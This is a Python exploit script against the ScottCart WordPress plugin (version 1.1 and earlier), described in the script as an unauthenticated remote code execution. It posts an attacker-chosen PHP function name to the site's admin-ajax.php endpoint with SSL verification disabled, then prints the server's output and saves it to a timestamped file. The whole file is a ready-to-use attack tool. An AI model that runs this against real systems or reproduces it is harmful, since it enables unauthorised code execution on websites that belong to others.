import argparse
import sys
from datetime import datetime
from urllib.parse import urljoin
import requests


# By Nxploited | Khaled Alenazi,

requests.packages.urllib3.disable_warnings()

HEADERS = {
    "User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.0.0 Safari/537.36"
}

def create_session():
    session = requests.Session()
    session.verify = False
    return session

def build_target_url(base_url):
    return urljoin(base_url, "/wp-admin/admin-ajax.php")

def build_payload(function_name):
    return {
        "action": "scottcart_load_function",
        "function": function_name
    }

def make_post_request(session, target_url, payload):
    try:
        response = session.post(
            target_url,
            data=payload,
            headers=HEADERS,
            timeout=10
        )
        return response
    except requests.exceptions.RequestException as e:
        print(f"[!] Error during request: {e}")
        sys.exit(1)

def format_timestamp():
    return datetime.now().strftime("%Y-%m-%d_%H-%M-%S")

def generate_filename(timestamp):
    return f"results_{timestamp}.txt"

def save_output_to_file(output, timestamp):
    filename = generate_filename(timestamp)
    try:
        with open(filename, "w", encoding="utf-8") as f:
            f.write(f"# Timestamp: {timestamp}\n\n")
            f.write(output)
        print(f"[+] Output saved to {filename}")
    except Exception as e:
        print(f"[!] Failed to save output: {e}")

def handle_response(response):
    if response.status_code == 200:
        print("[+] Exploit successful! Output:\n")
        print(response.text.strip())
    else:
        print(f"[!] Exploit failed with HTTP {response.status_code}")
        print(response.text.strip())
    return response.text.strip()

def exploit(url, function_name):
    session = create_session()
    target_url = build_target_url(url)
    payload = build_payload(function_name)
    response = make_post_request(session, target_url, payload)
    output = handle_response(response)
    timestamp = format_timestamp()
    save_output_to_file(output, timestamp)

def parse_arguments():
    parser = argparse.ArgumentParser(description='''
ScottCart <= 1.1 - Unauthenticated Remote Code Execution
By Nxploit Khaled Alenazi.
''')
    parser.add_argument("-u", "--url", required=True, help="Target base URL (e.g., http://192.168.100.74:888/wordpress)")
    parser.add_argument("-p", "--payload", default="phpinfo", help="Function to call (default: phpinfo)")
    return parser.parse_args()

def main():
    args = parse_arguments()
    exploit(args.url, args.payload)

if __name__ == "__main__":
    main()